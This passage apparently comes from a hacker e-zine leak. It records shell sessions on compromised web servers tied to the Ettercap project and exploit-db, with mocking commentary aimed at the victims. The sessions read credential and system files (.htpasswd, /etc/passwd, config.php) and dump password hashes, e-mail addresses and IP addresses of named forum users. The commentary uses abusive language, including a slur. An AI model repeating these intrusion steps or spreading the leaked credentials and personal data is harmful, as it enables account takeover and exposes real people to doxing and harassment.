r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php +-rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt + +$ cat config.php + shellcodeCategories, +25 +); + +redCategory = 34; + +?> + +$ cd .. +$ cd n3tw0rkTeRr0r15M + +$ ls -la +total 20 +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 . +drwxr-x--x 37 root root 4096 Oct 20 17:45 .. +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd +drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin +drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs + +$ cat .htpasswd +inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/ +inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1 + +$ cd htdocs + +$ ls -la +total 2240 +drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 . +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .. +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif +dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php +dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php +dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images +dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes +-rwxrwxrwx 1 n3tw0rkTeRr0r15M inj3ct0r 19444 Sep 26 12:27 index.php +dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 Jun 29 15:33 newthread.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 printthread.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php +dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 15:35 report.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics +dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark +dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29903 Jun 29 15:37 validator.php +-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27705 Jun 29 15:37 visitormessage.php + +$ cat includes/config.php +ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10: +L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151: +Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com:: +eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225: +KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163: +anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15: + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ ettercap ~ ! + +You would think that the authors of Ettercap, one of the most popular +whitehat pentesting tools, would know the basics of security. +Apparently they don't, or they just don't give a shit about what +happens to their users. + +So, why is their website so insecure? Ettercap's message board is +hosted at Sourceforge, so they share a server with thousands of other +customers. Every single customer is able to execute commands and +access the other project directories. Pretty stupid, eh? You only need +to find one hole in one hosted site and you can access ALL the project +databases. Of course that isn't ALoR's fault, it's Sourceforge's +fault. Regardless, people who care about security and data integrity +wouldn't use such a shitty provider, would they? To be fair, the +Ettercap project is dead. Most of the admins have been inactive for a +few years now, but that is no excuse for such a security mess. +Especially since the server was compromised some five years ago. + +Just look at the process list, horrible. Even the worst perl bots +(scax) get access. If such a poorly written bot can own this box, +everyone can. + +Some good advice to all other people/projects who are using +Sourceforge: Move. There are enough good alternatives. Yes, I am +talking to you Vim, get the fuck out of there. And to all Ettercap +users: arp poisoning is *not* hacking. If you want to achieve +something real, learn the fundamentals and not how to use a GUI. Don't +sniff the passwords of your friends and call yourself a pentester +(looking at you firesheep). + + _ _ + | | | | + ___| |_| |_ ___ _ __ ___ _ __ __ _ __ + / _ \ __| __/ _ \ '__/ __| '__|/ \ | '_ \ + | __/ |_| || __/ | | (__| | / /\ \ | |_) | + \___|\__|\__\___|_| \___|_| /_/ \_\| .__/ + | | + |_| + Baa. + I flood SID's + I'm a Hacker!! Baa. + Baa. Baa. I sit at starbucks +I sniff packets | I'm a Hacker!! +I'm a Hacker!! | Baa. +Baa.. | / + \ __ _ | / YOUR ALL FUCKING + \ .-.' `; `-._ __ _ __ _ SHEEP. + \ (_, .-:' `; `-._.-.:' `; `-._ + ,'o"( "HACKE(_, (_, ) + (__,-' ,'o"( "HACKE,'o"( "HACKER" )> STOP BEING SHEEP! + ( (__,-' (__,-' ) + `-'._.--._( ( ) FUCKING INNOVATE! + ||| |||`-'._.--._.-' `-'._.--._.-' + ||| ||| ||| ||| + +$ uname -a +Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux + +$ id +uid=48(apache) gid=48(apache) groups=48(apache),302(amqp) + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +nscd:x:28:28:NSCD Daemon:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +exim:x:93:93::/var/spool/exim:/sbin/nologin +rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin +rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin +nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +pcap:x:77:77::/var/arpwatch:/sbin/nologin +avahi:x:70:70:Avahi daemon:/:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +rpm:x:37:37::/var/lib/rpm:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin +named:x:25:25:Named:/var/named:/sbin/nologin +sashroot:x:0:500:sashroot:/sashroot:/bin/bash +osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin +puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +vhost:*:310:310:Vhost User:/home/vhost:/bin/bash +rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash +nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false +nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin +dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false +www:*:448:448:WWW User:/var/www:/bin/bash +sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash +sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash +avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin +oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin +munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin +rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin + +$ ps auxwww +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3] +root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0] +root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0] +root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0] +root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1] +root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1] +root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1] +root 8 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/2] +root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2] +root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2] +root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3] +root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3] +root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3] +root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4] +root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4] +root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4] +root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5] +root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5] +root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5] +root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6] +root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6] +root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6] +root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7] +root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7] +root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7] +root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0] +root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1] +root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2] +root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3] +root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4] +root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5] +root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6] +root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7] +root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper] +root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread] +root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0] +root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1] +root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2] +root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3] +root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4] +root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5] +root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6] +root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7] +root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid] +root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0] +root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1] +root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2] +root 240 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/3] +root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4] +root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5] +root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6] +root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7] +root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd] +root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod] +root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd] +root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0] +root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0] +root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1] +root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2] +root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3] +root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4] +root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5] +root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6] +root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7] +root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused] +root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0] +root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0] +root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1] +root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2] +root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3] +root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4] +root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5] +root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6] +root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7] +root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux] +root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1] +root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage] +root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2] +root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage] +root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped] +root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd] +root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald] +root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd] +root 813 0.0 0.0 12764 168 ? S + +$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email, +phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank +id WHERE user_rank > 0 ORDER BY user_rank +NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer +ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter +metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter +ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester +drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester +Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester +Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester +Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester +m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester +Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester +MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester +Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester +garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester +Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester +mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester +stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester +DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester +cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester +Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester +SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker +LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum +megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it: +Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor +daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor + + + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ exploit-db ~ + +Now we come to a different topic. A topic about people who leech off +what the scene creates and call it their own. About people who +copyright ideas and papers about security related topics that have +been around for years. How many XSS-Papers are there currently on +exploit-db? How many retarded strcpy(buf, argv[1])-papers are being +written over and over again? About whitehats who think releasing +exploits would make the world much more safe. And because of fame. +They all want fame so badly that they do anything and everything in +order to be part of the security industry. What's even more hilarious +is that these "famous" security people keep getting owned. We mean +el8, phc, h0no, and zf0 have all owned these "Security Rockstar" +faggots and yet, nothing changes. Or the attacks are categorized as +"skiddy" behavior. It's rediculous how terrible the industry is. There +is no accountability anymore. + +Still there are some lame skids that need a good spanking. Stupid 10 +year olds who take perl-exploits to destroy clan-pages for fun and +call themselves "hackers" without knowing what they are doing. +Criminals who take exploits to steal payment stuff for their own +selfish financial gain. And to get their friends thrown in jail +(soup). Fame and money... Get the message? + +$ uname -a +Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux + +$ id +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +$ pwd +/var/www + +$ ls -la +total 24180 +drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 . +drwxr-xr-x 19 root root 4096 Sep 24 09:26 .. +-rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess +-rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save +-rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png +drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734 +-rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php +-rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2 +-rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html +-rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt +drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners +-rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico +-rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt +-rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt +drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums +drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404 +-rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php +-rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php +-rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html +-rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt +-rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml +drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images +-rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php +drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads +-rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php +drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies +-rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php +drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default +-rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html +-rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt +-rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html +-rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt +-rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml +-rw-r--r-- 1 www-data www-data 2102 Sep 1 05:40 rss.php +drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts +-rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php +-rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php +-rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml +-rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl +-rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml +-rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz +drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider +drwxr-xr-x 2 